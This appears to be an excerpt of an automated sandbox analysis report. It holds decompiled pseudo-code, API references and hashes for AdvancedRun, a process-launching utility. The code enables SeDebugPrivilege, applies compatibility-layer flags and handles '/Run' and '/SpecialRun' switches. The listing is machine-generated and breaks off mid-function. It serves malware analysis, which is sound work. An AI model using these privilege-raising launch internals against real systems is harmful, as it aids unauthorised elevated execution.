                                                                  				int _v124;
                                                                  				short _v148;
                                                                  				signed int _v152;
                                                                  				intOrPtr _v168;
                                                                  				intOrPtr _v172;
                                                                  				intOrPtr _v176;
                                                                  				intOrPtr _v180;
                                                                  				void _v192;
                                                                  				char _v196;
                                                                  				char _v228;
                                                                  				void _v258;
                                                                  				int _v260;
                                                                  				void _v786;
                                                                  				short _v788;
                                                                  				void _v1314;
                                                                  				short _v1316;
                                                                  				void _v1842;
                                                                  				short _v1844;
                                                                  				void _v18234;
                                                                  				short _v18236;
                                                                  				char _v83772;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				short* _t174;
                                                                  				short _t175;
                                                                  				signed int _t176;
                                                                  				short _t177;
                                                                  				short _t178;
                                                                  				int _t184;
                                                                  				signed int _t187;
                                                                  				intOrPtr _t207;
                                                                  				intOrPtr _t219;
                                                                  				int* _t252;
                                                                  				int* _t253;
                                                                  				int* _t266;
                                                                  				int* _t267;
                                                                  				wchar_t* _t270;
                                                                  				int _t286;
                                                                  				void* _t292;
                                                                  				void* _t304;
                                                                  				WCHAR* _t308;
                                                                  				WCHAR* _t310;
                                                                  				intOrPtr* _t311;
                                                                  				int _t312;
                                                                  				WCHAR* _t315;
                                                                  				void* _t325;
                                                                  				void* _t328;
                                                                  
                                                                  				_t304 = __edx;
                                                                  				E0040B550(0x1473c, __ecx);
                                                                  				_t286 = 0;
                                                                  				 *_a4 = 0;
                                                                  				_v12 = 0;
                                                                  				_v16 = 0;
                                                                  				_v20 = 0;
                                                                  				memset( &_v192, 0, 0x40);
                                                                  				_v60 = 0;
                                                                  				asm("stosd");
                                                                  				asm("stosd");
                                                                  				asm("stosd");
                                                                  				_v24 = 0;
                                                                  				_v40 = 0;
                                                                  				_v28 = 0;
                                                                  				_v36 = 0;
                                                                  				_v32 = 0x100;
                                                                  				_v44 = 0;
                                                                  				_v1316 = 0;
                                                                  				memset( &_v1314, 0, 0x208);
                                                                  				_v788 = 0;
                                                                  				memset( &_v786, 0, 0x208);
                                                                  				_t315 = _a8;
                                                                  				_t328 = _t325 + 0x24;
                                                                  				_v83772 = 0;
                                                                  				_v196 = 0x44;
                                                                  				E00404923(0x104,  &_v788, _t315);
                                                                  				if(wcschr(_t315, 0x25) != 0) {
                                                                  					ExpandEnvironmentStringsW(_t315,  &_v788, 0x104);
                                                                  				}
                                                                  				if(_t315[0x2668] != _t286 && wcschr( &_v788, 0x5c) == 0) {
                                                                  					_v8 = _t286;
                                                                  					_v1844 = _t286;
                                                                  					memset( &_v1842, _t286, 0x208);
                                                                  					_t328 = _t328 + 0xc;
                                                                  					SearchPathW(_t286,  &_v788, _t286, 0x104,  &_v1844,  &_v8);
                                                                  					if(_v1844 != _t286) {
                                                                  						E00404923(0x104,  &_v788,  &_v1844);
                                                                  					}
                                                                  				}
                                                                  				_t308 =  &(_t315[0x2106]);
                                                                  				if( *_t308 == _t286) {
                                                                  					E00404B5C( &_v1316,  &_v788);
                                                                  					__eflags = _v1316 - _t286;
                                                                  					_t315 = _a8;
                                                                  					_pop(_t292);
                                                                  					if(_v1316 == _t286) {
                                                                  						goto L11;
                                                                  					}
                                                                  					goto L10;
                                                                  				} else {
                                                                  					_v20 = _t308;
                                                                  					_t270 = wcschr(_t308, 0x25);
                                                                  					_pop(_t292);
                                                                  					if(_t270 == 0) {
                                                                  						L11:
                                                                  						_t174 =  &(_t315[0x220e]);
                                                                  						if( *_t174 != 1) {
                                                                  							_v152 = _v152 | 0x00000001;
                                                                  							_v148 =  *_t174;
                                                                  						}
                                                                  						_t309 = ",";
                                                                  						if(_t315[0x2210] != _t286 && _t315[0x2212] != _t286) {
                                                                  							_v260 = _t286;
                                                                  							memset( &_v258, _t286, 0x3e);
                                                                  							_v124 = _t286;
                                                                  							memset( &_v122, _t286, 0x3e);
                                                                  							_v8 = _t286;
                                                                  							E004052F3( &(_t315[0x2212]), _t292,  &_v260, 0x1f,  &_v8, ",");
                                                                  							E004052F3( &(_t315[0x2212]), _t292,  &_v124, 0x1f,  &_v8, ",");
                                                                  							_v152 = _v152 | 0x00000004;
                                                                  							_t266 =  &_v260;
                                                                  							_push(_t266);
                                                                  							L0040B1F8();
                                                                  							_v180 = _t266;
                                                                  							_t328 = _t328 + 0x3c;
                                                                  							_t267 =  &_v124;
                                                                  							L0040B1F8();
                                                                  							_t292 = _t267;
                                                                  							_v176 = _t267;
                                                                  						}
                                                                  						if(_t315[0x2232] != _t286 && _t315[0x2234] != _t286) {
                                                                  							_v260 = _t286;
                                                                  							memset( &_v258, _t286, 0x3e);
                                                                  							_v124 = _t286;
                                                                  							memset( &_v122, _t286, 0x3e);
                                                                  							_v8 = _t286;
                                                                  							E004052F3( &(_t315[0x2234]), _t292,  &_v260, 0x1f,  &_v8, _t309);
                                                                  							E004052F3( &(_t315[0x2234]), _t292,  &_v124, 0x1f,  &_v8, _t309);
                                                                  							_v152 = _v152 | 0x00000002;
                                                                  							_t252 =  &_v260;
                                                                  							_push(_t252);
                                                                  							L0040B1F8();
                                                                  							_v172 = _t252;
                                                                  							_t328 = _t328 + 0x3c;
                                                                  							_t253 =  &_v124;
                                                                  							_push(_t253);
                                                                  							L0040B1F8();
                                                                  							_v168 = _t253;
                                                                  						}
                                                                  						_t310 =  &(_t315[0x105]);
                                                                  						if( *_t310 != _t286) {
                                                                  							if(_t315[0x266a] == _t286 || wcschr(_t310, 0x25) == 0) {
                                                                  								_push(_t310);
                                                                  							} else {
                                                                  								_v18236 = _t286;
                                                                  								memset( &_v18234, _t286, 0x4000);
                                                                  								_t328 = _t328 + 0xc;
                                                                  								ExpandEnvironmentStringsW(_t310,  &_v18236, 0x2000);
                                                                  								_push( &_v18236);
                                                                  							}
                                                                  							_push( &_v788);
                                                                  							_push(L"\"%s\" %s");
                                                                  							_push(0x7fff);
                                                                  							_push( &_v83772);
                                                                  							L0040B1EC();
                                                                  							_v24 =  &_v83772;
                                                                  						}
                                                                  						_t175 = _t315[0x220c];
                                                                  						if(_t175 != 0x20) {
                                                                  							_v12 = _t175;
                                                                  						}
                                                                  						_t311 = _a4;
                                                                  						if(_t315[0x2254] == 2) {
                                                                  							E00401D1E(_t311, L"RunAsInvoker");
                                                                  						}
                                                                  						_t176 = _t315[0x265c];
                                                                  						if(_t176 != _t286 && _t176 - 1 <= 0xc) {
                                                                  							E00401D1E(_t311,  *((intOrPtr*)(0x40f2a0 + _t176 * 4)));
                                                                  						}
                                                                  						_t177 = _t315[0x265e];
                                                                  						if(_t177 != 1) {
                                                                  							__eflags = _t177 - 2;
                                                                  							if(_t177 != 2) {
                                                                  								goto L37;
                                                                  							}
                                                                  							_push(L"16BITCOLOR");
                                                                  							goto L36;
                                                                  						} else {
                                                                  							_push(L"256COLOR");
                                                                  							L36:
                                                                  							E00401D1E(_t311);
                                                                  							L37:
                                                                  							if(_t315[0x2660] == _t286) {
                                                                  								__eflags = _t315[0x2662] - _t286;
                                                                  								if(_t315[0x2662] == _t286) {
                                                                  									__eflags = _t315[0x2664] - _t286;
                                                                  									if(_t315[0x2664] == _t286) {
                                                                  										__eflags = _t315[0x2666] - _t286;
                                                                  										if(_t315[0x2666] == _t286) {
                                                                  											L46:
                                                                  											_t178 = _t315[0x2a6e];
                                                                  											_t358 = _t178 - 3;
                                                                  											if(_t178 != 3) {
                                                                  												__eflags = _t178 - 2;
                                                                  												if(_t178 != 2) {
                                                                  													__eflags =  *_t311 - _t286;
                                                                  													if( *_t311 == _t286) {
                                                                  														_push(_t286);
                                                                  													} else {
                                                                  														_push(_t311);
                                                                  													}
                                                                  													SetEnvironmentVariableW(L"__COMPAT_LAYER", ??);
                                                                  													L63:
                                                                  													_t293 = _t311;
                                                                  													_t184 = E00401FE6(_t315, _t311, _t304,  &_v788, _v24, _v12, _v16, _v20,  &_v196,  &_v60); // executed
                                                                  													_t312 = _t184;
                                                                  													if(_t312 == _t286 && _v60 != _t286) {
                                                                  														_t363 = _t315[0x266c] - _t286;
                                                                  														if(_t315[0x266c] != _t286) {
                                                                  															_t187 = E00401A3F(_t293, _t363,  &(_t315[0x266e]));
                                                                  															_a4 = _a4 | 0xffffffff;
                                                                  															_a8 = _t286;
                                                                  															GetProcessAffinityMask(_v60,  &_a8,  &_a4);
                                                                  															_t184 = SetProcessAffinityMask(_v60, _a4 & _t187);
                                                                  														}
                                                                  													}
                                                                  													E004055D1(_t184,  &_v44);
                                                                  													return _t312;
                                                                  												}
                                                                  												E00405497( &_v92);
                                                                  												E00405497( &_v228);
                                                                  												E0040149F(__eflags,  &_v92);
                                                                  												E0040135C(E004055EC( &(_t315[0x2a70])), __eflags,  &_v228);
                                                                  												E00401551( &_v228, _t304, __eflags,  &_v92);
                                                                  												_t204 = _a4;
                                                                  												__eflags =  *_a4;
                                                                  												if(__eflags != 0) {
                                                                  													E004014E9( &_v92, _t304, __eflags,  &_v92, _t204);
                                                                  												}
                                                                  												E00401421( &_v44, _t304,  &_v92, __eflags);
                                                                  												_t207 = _v28;
                                                                  												__eflags = _t207;
                                                                  												_v16 = 0x40c4e8;
                                                                  												if(_t207 != 0) {
                                                                  													_v16 = _t207;
                                                                  												}
                                                                  												_v12 = _v12 | 0x00000400;
                                                                  												E004054B9( &_v228);
                                                                  												E004054B9( &_v92);
                                                                  												_t286 = 0;
                                                                  												__eflags = 0;
                                                                  												L58:
                                                                  												_t315 = _a8;
                                                                  												_t311 = _a4;
                                                                  												goto L63;
                                                                  											}
                                                                  											E00405497( &_v92);
                                                                  											E0040135C(E004055EC( &(_t315[0x2a70])), _t358,  &_v92);
                                                                  											_t359 =  *_t311 - _t286;
                                                                  											if( *_t311 != _t286) {
                                                                  												E004014E9( &_v92, _t304, _t359,  &_v92, _t311);
                                                                  											}
                                                                  											E00401421( &_v44, _t304,  &_v92, _t359);
                                                                  											_t219 = _v28;
                                                                  											_v16 = 0x40c4e8;
                                                                  											if(_t219 != _t286) {
                                                                  												_v16 = _t219;
                                                                  											}
                                                                  											_v12 = _v12 | 0x00000400;
                                                                  											E004054B9( &_v92);
                                                                  											goto L58;
                                                                  										}
                                                                  										_push(L"HIGHDPIAWARE");
                                                                  										L45:
                                                                  										E00401D1E(_t311);
                                                                  										goto L46;
                                                                  									}
                                                                  									_push(L"DISABLEDWM");
                                                                  									goto L45;
                                                                  								}
                                                                  								_push(L"DISABLETHEMES");
                                                                  								goto L45;
                                                                  							}
                                                                  							_push(L"640X480");
                                                                  							goto L45;
                                                                  						}
                                                                  					}
                                                                  					ExpandEnvironmentStringsW(_t308,  &_v1316, 0x104);
                                                                  					L10:
                                                                  					_v20 =  &_v1316;
                                                                  					goto L11;
                                                                  				}
                                                                   			}
                                                                  0x004024cd
                                                                  0x004024d1
                                                                  0x004024ed
                                                                  0x004024f0
                                                                  0x00402506
                                                                  0x0040250b
                                                                  0x00402512
                                                                  0x00402518
                                                                  0x00402519
                                                                  0x0040251e
                                                                  0x00402524
                                                                  0x00402527
                                                                  0x0040252b
                                                                  0x00402530
                                                                  0x00402531
                                                                  0x00402531
                                                                  0x0040253d
                                                                  0x0040255a
                                                                  0x00402561
                                                                  0x00402570
                                                                  0x00402574
                                                                  0x00402590
                                                                  0x00402593
                                                                  0x004025a9
                                                                  0x004025ae
                                                                  0x004025b5
                                                                  0x004025bb
                                                                  0x004025bc
                                                                  0x004025c1
                                                                  0x004025c7
                                                                  0x004025ca
                                                                  0x004025cd
                                                                  0x004025ce
                                                                  0x004025d4
                                                                  0x004025d4
                                                                  0x004025da
                                                                  0x004025e3
                                                                  0x004025eb
                                                                  0x00402633
                                                                  0x004025fb
                                                                  0x00402608
                                                                  0x0040260f
                                                                  0x00402614
                                                                  0x00402624
                                                                  0x00402630
                                                                  0x00402630
                                                                  0x0040263a
                                                                  0x0040263b
                                                                  0x00402646
                                                                  0x0040264b
                                                                  0x0040264c
                                                                  0x0040265a
                                                                  0x0040265a
                                                                  0x0040265d
                                                                  0x00402666
                                                                  0x00402668
                                                                  0x00402668
                                                                  0x00402672
                                                                  0x00402675
                                                                  0x0040267e
                                                                  0x0040267e
                                                                  0x00402683
                                                                  0x0040268b
                                                                  0x0040269e
                                                                  0x0040269e
                                                                  0x004026a3
                                                                  0x004026ac
                                                                  0x004026b5
                                                                  0x004026b8
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x004026ba
                                                                  0x00000000
                                                                  0x004026ae
                                                                  0x004026ae
                                                                  0x004026bf
                                                                  0x004026c1
                                                                  0x004026c6
                                                                  0x004026cc
                                                                  0x004026d5
                                                                  0x004026db
                                                                  0x004026e4
                                                                  0x004026ea
                                                                  0x004026f3
                                                                  0x004026f9
                                                                  0x00402707
                                                                  0x00402707
                                                                  0x0040270d
                                                                  0x00402710
                                                                  0x0040276d
                                                                  0x00402770
                                                                  0x0040280b
                                                                  0x0040280e
                                                                  0x00402813
                                                                  0x00402810
                                                                  0x00402810
                                                                  0x00402810
                                                                  0x00402819
                                                                  0x0040281f
                                                                  0x00402836
                                                                  0x00402841
                                                                  0x00402846
                                                                  0x0040284a
                                                                  0x00402851
                                                                  0x00402857
                                                                  0x00402860
                                                                  0x00402865
                                                                  0x00402876
                                                                  0x00402879
                                                                  0x00402888
                                                                  0x00402888
                                                                  0x00402857
                                                                  0x00402891
                                                                  0x0040289c
                                                                  0x0040289c
                                                                  0x00402779
                                                                  0x00402784
                                                                  0x0040278d
                                                                  0x004027a4
                                                                  0x004027b3
                                                                  0x004027b8
                                                                  0x004027bb
                                                                  0x004027bf
                                                                  0x004027c6
                                                                  0x004027c6
                                                                  0x004027d1
                                                                  0x004027d6
                                                                  0x004027d9
                                                                  0x004027db
                                                                  0x004027e2
                                                                  0x004027e4
                                                                  0x004027e4
                                                                  0x004027e7
                                                                  0x004027f4
                                                                  0x004027fc
                                                                  0x00402801
                                                                  0x00402801
                                                                  0x00402803
                                                                  0x00402803
                                                                  0x00402806
                                                                  0x00000000
                                                                  0x00402806
                                                                  0x00402715
                                                                  0x00402729
                                                                  0x0040272e
                                                                  0x00402731
                                                                  0x00402738
                                                                  0x00402738
                                                                  0x00402743
                                                                  0x00402748
                                                                  0x0040274d
                                                                  0x00402754
                                                                  0x00402756
                                                                  0x00402756
                                                                  0x00402759
                                                                  0x00402763
                                                                  0x00000000
                                                                  0x00402763
                                                                  0x004026fb
                                                                  0x00402700
                                                                  0x00402702
                                                                  0x00000000
                                                                  0x00402702
                                                                  0x004026ec
                                                                  0x00000000
                                                                  0x004026ec
                                                                  0x004026dd
                                                                  0x00000000
                                                                  0x004026dd
                                                                  0x004026ce
                                                                  0x00000000
                                                                  0x004026ce
                                                                  0x004026ac
                                                                  0x00402443
                                                                  0x0040246a
                                                                  0x00402470
                                                                  0x00000000
                                                                  0x00402470

                                                                  APIs
                                                                  • memset.MSVCRT ref: 00402300
                                                                  • memset.MSVCRT ref: 0040233E
                                                                  • memset.MSVCRT ref: 00402356
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                  • wcschr.MSVCRT ref: 00402387
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004023A0
                                                                    • Part of subcall function 00404B5C: wcscpy.MSVCRT ref: 00404B61
                                                                    • Part of subcall function 00404B5C: wcsrchr.MSVCRT ref: 00404B69
                                                                  • wcschr.MSVCRT ref: 004023B7
                                                                  • memset.MSVCRT ref: 004023D9
                                                                  • SearchPathW.KERNEL32(00000000,?,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00000208), ref: 004023F6
                                                                  • wcschr.MSVCRT ref: 0040242B
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 00402443
                                                                  • memset.MSVCRT ref: 004024BE
                                                                  • memset.MSVCRT ref: 004024D1
                                                                  • _wtoi.MSVCRT ref: 00402519
                                                                  • _wtoi.MSVCRT ref: 0040252B
                                                                  • memset.MSVCRT ref: 00402561
                                                                  • memset.MSVCRT ref: 00402574
                                                                  • _wtoi.MSVCRT ref: 004025BC
                                                                  • _wtoi.MSVCRT ref: 004025CE
                                                                  • wcschr.MSVCRT ref: 004025F0
                                                                  • memset.MSVCRT ref: 0040260F
                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,?,00002000,?,?,?,?,?,?,?,?,00000208), ref: 00402624
                                                                  • _snwprintf.MSVCRT ref: 0040264C
                                                                  • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,00000000), ref: 00402819
                                                                  • GetProcessAffinityMask.KERNEL32 ref: 00402879
                                                                  • SetProcessAffinityMask.KERNEL32 ref: 00402888
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$Environment_wtoiwcschr$ExpandStrings$AffinityMaskProcess$PathSearchVariable_snwprintfmemcpywcscpywcslenwcsrchr
                                                                  • String ID: "%s" %s$16BITCOLOR$256COLOR$640X480$D$DISABLEDWM$DISABLETHEMES$HIGHDPIAWARE$RunAsInvoker$__COMPAT_LAYER
                                                                  • API String ID: 2452314994-435178042
                                                                  • Opcode ID: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                  • Instruction ID: b54a7db1e05dda42e7bfc3830e2036fe484084dd7c1f23c6c807eede0ded9d8d
                                                                  • Opcode Fuzzy Hash: 067d403336562cb18e4ef95dc35e81972e5343f3ed9e099bed5cf17b41ec62b0
                                                                  • Instruction Fuzzy Hash: 03F14F72900218AADB20EFA5CD85ADEB7B8EF04304F1045BBE619B71D1D7789A84CF59
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 89%
                                                                  			E00408533(void* __ecx, void* __edx, void* __eflags, char _a8, intOrPtr _a12, char _a32, WCHAR* _a40, WCHAR* _a44, intOrPtr _a48, WCHAR* _a52, WCHAR* _a56, char _a60, int _a64, char* _a68, int _a72, char _a76, int _a80, char* _a84, int _a88, long _a92, void _a94, long _a620, void _a622, char _a1132, char _a1148, WCHAR* _a3196, WCHAR* _a3200, WCHAR* _a3204, WCHAR* _a3208, void* _a3212, char _a3216, int _a5264, int _a5268, int _a5272, int _a5276, int _a5280, char _a5288, char _a5292, int _a7340, int _a7344, int _a7348, int _a7352, int _a7356) {
                                                                  				char _v0;
                                                                  				WCHAR* _v4;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* _t76;
                                                                  				void* _t82;
                                                                  				wchar_t* _t85;
                                                                  				void* _t86;
                                                                  				void* _t87;
                                                                  				intOrPtr _t92;
                                                                  				wchar_t* _t93;
                                                                  				intOrPtr _t95;
                                                                  				int _t106;
                                                                  				char* _t110;
                                                                  				intOrPtr _t115;
                                                                  				wchar_t* _t117;
                                                                  				intOrPtr _t124;
                                                                  				wchar_t* _t125;
                                                                  				intOrPtr _t131;
                                                                  				wchar_t* _t132;
                                                                  				int _t154;
                                                                  				int _t156;
                                                                  				void* _t159;
                                                                  				intOrPtr _t162;
                                                                  				void* _t177;
                                                                  				void* _t178;
                                                                  				void* _t179;
                                                                  				intOrPtr _t181;
                                                                  				int _t187;
                                                                  				intOrPtr _t188;
                                                                  				intOrPtr _t190;
                                                                  				intOrPtr _t198;
                                                                  				signed int _t205;
                                                                  				signed int _t206;
                                                                  
                                                                  				_t179 = __edx;
                                                                  				_t158 = __ecx;
                                                                  				_t206 = _t205 & 0xfffffff8;
                                                                  				E0040B550(0x1ccc, __ecx);
                                                                  				_t76 = E0040313D(_t158);
                                                                  				if(_t76 != 0) {
                                                                  					E0040AC52();
                                                                  					SetErrorMode(0x8001); // executed
                                                                  					_t156 = 0;
                                                                  					 *0x40fa70 = 0x11223344;
                                                                  					EnumResourceTypesW(GetModuleHandleW(0), E0040A3C1, 0); // executed
                                                                  					_t82 = E00405497( &_a8);
                                                                  					_a48 = 0x20;
                                                                  					_a40 = 0;
                                                                  					_a52 = 0;
                                                                  					_a44 = 0;
                                                                  					_a56 = 0;
                                                                  					E004056B5(_t158, __eflags, _t82, _a12);
                                                                  					E00408F48(_t158, __eflags, L"SeDebugPrivilege"); // executed
                                                                  					 *_t206 = L"/SpecialRun";
                                                                  					_t85 = E0040585C( &_v0);
                                                                  					__eflags = _t85;
                                                                  					if(_t85 != 0) {
                                                                  						L8:
                                                                  						_t86 = E0040585C( &_a8, L"/Run");
                                                                  						__eflags = _t86 - _t156;
                                                                  						if(_t86 < _t156) {
                                                                  							_t87 = E0040585C( &_a8, L"/cfg");
                                                                  							__eflags = _t87 - _t156;
                                                                  							if(_t87 >= _t156) {
                                                                  								_t162 =  *0x40fa74; // 0x4101c8
                                                                  								_t41 = _t87 + 1; // 0x1
                                                                  								ExpandEnvironmentStringsW(E0040584C( &_a8, _t41), _t162 + 0x5504, 0x104);
                                                                  								_t115 =  *0x40fa74; // 0x4101c8
                                                                  								_t117 = wcschr(_t115 + 0x5504, 0x5c);
                                                                  								__eflags = _t117;
                                                                  								if(_t117 == 0) {
                                                                  									_a92 = _t156;
                                                                  									memset( &_a94, _t156, 0x208);
                                                                  									_a620 = _t156;
                                                                  									memset( &_a622, _t156, 0x208);
                                                                  									GetCurrentDirectoryW(0x104,  &_a92);
                                                                  									_t124 =  *0x40fa74; // 0x4101c8
                                                                  									_t125 = _t124 + 0x5504;
                                                                  									_v4 = _t125;
                                                                  									_t187 = wcslen(_t125);
                                                                  									_t51 = wcslen( &_a92) + 1; // 0x1
                                                                  									__eflags = _t187 + _t51 - 0x104;
                                                                  									if(_t187 + _t51 >= 0x104) {
                                                                  										_a620 = _t156;
                                                                  									} else {
                                                                  										E00404BE4( &_a620,  &_a92, _v4);
                                                                  									}
                                                                  									_t131 =  *0x40fa74; // 0x4101c8
                                                                  									_t132 = _t131 + 0x5504;
                                                                  									__eflags = _t132;
                                                                  									wcscpy(_t132,  &_a620);
                                                                  								}
                                                                  							}
                                                                  							E00402F31(_t156);
                                                                  							_t181 =  *0x40fa74; // 0x4101c8
                                                                  							_pop(_t159);
                                                                  							_a84 =  &_a8;
                                                                  							_a76 = 0x40cb0c;
                                                                  							_a88 = _t156;
                                                                  							_a80 = _t156;
                                                                  							E0040177C( &_a76, _t181 + 0x10, __eflags, _t156);
                                                                  							_t92 =  *0x40fa74; // 0x4101c8
                                                                  							__eflags =  *((intOrPtr*)(_t92 + 0x5710)) - _t156;
                                                                  							if( *((intOrPtr*)(_t92 + 0x5710)) == _t156) {
                                                                  								_t93 = E0040585C( &_a8, L"/savelangfile");
                                                                  								__eflags = _t93;
                                                                  								if(_t93 < 0) {
                                                                  									E00406420();
                                                                  									__imp__CoInitialize(_t156);
                                                                  									_t95 =  *0x40fa74; // 0x4101c8
                                                                  									E00408910(_t95 + 0x10, _t159, 0x416f60);
                                                                  									 *((intOrPtr*)( *0x4158e0 + 8))(_t156);
                                                                  									_t198 =  *0x40fa74; // 0x4101c8
                                                                  									E00408910(0x416f60, 0x4158e0, _t198 + 0x10);
                                                                  									E00402F31(1);
                                                                  									__imp__CoUninitialize();
                                                                  								} else {
                                                                  									E004065BE(_t159);
                                                                  								}
                                                                  								goto L7;
                                                                  							} else {
                                                                  								_t64 = _t92 + 0x10; // 0x4101d8
                                                                  								_a7356 = _t156;
                                                                  								_a7352 = _t156;
                                                                  								_a7340 = _t156;
                                                                  								_a7344 = _t156;
                                                                  								_a7348 = _t156;
                                                                  								_t156 = E00401D40(_t179, _t64,  &_a5292);
                                                                  								_t110 =  &_a5288;
                                                                  								L6:
                                                                  								E004035FB(_t110);
                                                                  								L7:
                                                                  								E004054B9( &_v0);
                                                                  								E004099D4( &_a32);
                                                                  								E004054B9( &_v0);
                                                                  								_t106 = _t156;
                                                                  								goto L2;
                                                                  							}
                                                                  						}
                                                                  						_t26 = _t86 + 1; // 0x1
                                                                  						_t173 = _t26;
                                                                  						__eflags =  *((intOrPtr*)(E0040584C( &_a8, _t26))) - _t156;
                                                                  						if(__eflags == 0) {
                                                                  							E00402F31(_t156);
                                                                  						} else {
                                                                  							E00402FC6(_t173, __eflags, _t138);
                                                                  						}
                                                                  						_t188 =  *0x40fa74; // 0x4101c8
                                                                  						_a68 =  &_a8;
                                                                  						_a60 = 0x40cb0c;
                                                                  						_a72 = _t156;
                                                                  						_a64 = _t156;
                                                                  						E0040177C( &_a60, _t188 + 0x10, __eflags, _t156);
                                                                  						_t190 =  *0x40fa74; // 0x4101c8
                                                                  						_a5280 = _t156;
                                                                  						_a5276 = _t156;
                                                                  						_a5264 = _t156;
                                                                  						_a5268 = _t156;
                                                                  						_a5272 = _t156;
                                                                  						_t156 = E00401D40(_t179, _t190 + 0x10,  &_a3216);
                                                                  						_t110 =  &_a3212;
                                                                  						goto L6;
                                                                  					}
                                                                  					__eflags = _a56 - 3;
                                                                  					if(_a56 != 3) {
                                                                  						goto L8;
                                                                  					}
                                                                  					__eflags = 1;
                                                                  					_a3212 = 0;
                                                                  					_a3208 = 0;
                                                                  					_a3196 = 0;
                                                                  					_a3200 = 0;
                                                                  					_a3204 = 0;
                                                                  					_v4 = 0;
                                                                  					_v0 = 0;
                                                                  					swscanf(E0040584C( &_v0, 1), L"%I64x",  &_v4);
                                                                  					_t177 = 2;
                                                                  					_push(E0040584C( &_v0, _t177));
                                                                  					L0040B1F8();
                                                                  					_pop(_t178);
                                                                  					_t154 = E00401AC9(_t178, _t179, __eflags,  &_a1148, _v4, _v0, _t152); // executed
                                                                  					_t156 = _t154;
                                                                  					_t110 =  &_a1132;
                                                                  					goto L6;
                                                                  				} else {
                                                                  					_t106 = _t76 + 1;
                                                                  					L2:
                                                                  					return _t106;
                                                                  				}
                                                                  			}

                                                                  APIs
                                                                    • Part of subcall function 0040313D: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                    • Part of subcall function 0040313D: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                    • Part of subcall function 0040313D: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                    • Part of subcall function 0040313D: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                  • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00408563
                                                                  • GetModuleHandleW.KERNEL32(00000000,0040A3C1,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040857C
                                                                  • EnumResourceTypesW.KERNEL32 ref: 00408583
                                                                  • swscanf.MSVCRT ref: 00408620
                                                                  • _wtoi.MSVCRT ref: 00408633
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.281017774.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.281011952.0000000000400000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281026440.000000000040C000.00000002.00020000.sdmp
• Associated: 00000007.00000002.281033089.000000000040F000.00000004.00020000.sdmp
• Associated: 00000007.00000002.281038498.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes_wtoiswscanf
                                                                  • String ID: $%I64x$/Run$/cfg$/savelangfile$SeDebugPrivilege$`oA$XA
                                                                  • API String ID: 3933224404-3784219877
                                                                  • Opcode ID: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                  • Instruction ID: 6a1ad454fb11d14b300c4ed281ce3bcdfe782ea4983c0409628bf6e0aeb57f2c
                                                                  • Opcode Fuzzy Hash: 09c11c85140e2dc0a2d539678250e4bdf5192368ee7cdfd4c31c34b131dbb70b
                                                                  • Instruction Fuzzy Hash: 7FA16F71508340DBD720EF65DD8599BB7E8FB88308F50493FF588A3292DB3899098F5A
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  C-Code - Quality: 81%
                                                                  			E00401FE6(void* __eax, void* __ecx, void* __edx, WCHAR* _a4, WCHAR* _a8, long _a12, void* _a16, WCHAR* _a20, struct _STARTUPINFOW* _a24, struct _PROCESS_INFORMATION* _a28) {
                                                                  				int _v8;
                                                                  				long _v12;
                                                                  				wchar_t* _v16;
                                                                  				void _v546;
                                                                  				long _v548;
                                                                  				void _v1074;
                                                                  				char _v1076;
                                                                  				void* __esi;
                                                                  				long _t84;
                                                                  				int _t87;
                                                                  				wchar_t* _t88;
                                                                  				int _t92;
                                                                  				void* _t93;
                                                                  				int _t94;
                                                                  				int _t96;
                                                                  				int _t99;
                                                                  				int _t104;
                                                                  				long _t105;
                                                                  				int _t110;
                                                                  				void** _t112;
                                                                  				int _t113;
                                                                  				intOrPtr _t131;
                                                                  				wchar_t* _t132;
                                                                  				int* _t148;
                                                                  				wchar_t* _t149;
                                                                  				int _t151;
                                                                  				void* _t152;
                                                                  				void* _t153;
